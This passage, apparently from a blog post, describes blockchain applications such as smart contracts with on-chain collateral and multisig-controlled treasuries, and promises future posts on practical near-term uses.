* Smart contracts: here users (typically two of them) agree via user interface to execute block chain code, which may include transfer of money and other chain-titled assets at various times or under various conditions, transfer and verification of other kinds of information, and other combinations of wet or traditional (off-chain) and dry (on-chain) performance. A block chain can hold cryptocurrency as collateral (like an escrow) which incentivizes off-chain performance that can be verified on-chain, by the parties or by third parties. A full block chain computer can pool on-chain assets into a single chain-controlled risk pool spread among many similar financial contracts, reducing the amount of collateral that needs to be stored on-chain while minimizing the need for off-chain collateral calls. The block chain can also make the search, negotiation, and verification phases of contracting more reliable and secure. With on-chain smart contracts we will be able to buy and sell many online services and financial instruments by button and slider instead of by laboriously filling out forms that disclose our private information.

* On-chain treasuries, trusts, and similar, where money lives on the block chain and is controlled by multiple signature ("multisig") authority.  Putting a treasury with signature authority on a block chain computer is low-hanging fruit, but is often tied to more speculative efforts under the label "distributed autonomous organization (DAO)", which may include voting shares and other mechanisms to control the treasury like a corporation or other kind of of organization.

I hope to discuss these block chain applications, especially smart contracts, in future posts. While there is much futurism in many block chain discussions, including many trying to solve problems that aren't actually solved by the block chain, I will generally stick to low-hanging fruit that could be usefully implemented on Quixcoin, Ethereum, or similar technology in the near future, often interfacing to still necessary parts of traditional protocols and institutions rather than trying to reinvent and replace them in whole.

References

Here is a list of basic computer science papers describing the technology of block chains (including cryptocurrencies).

Wet vs. dry code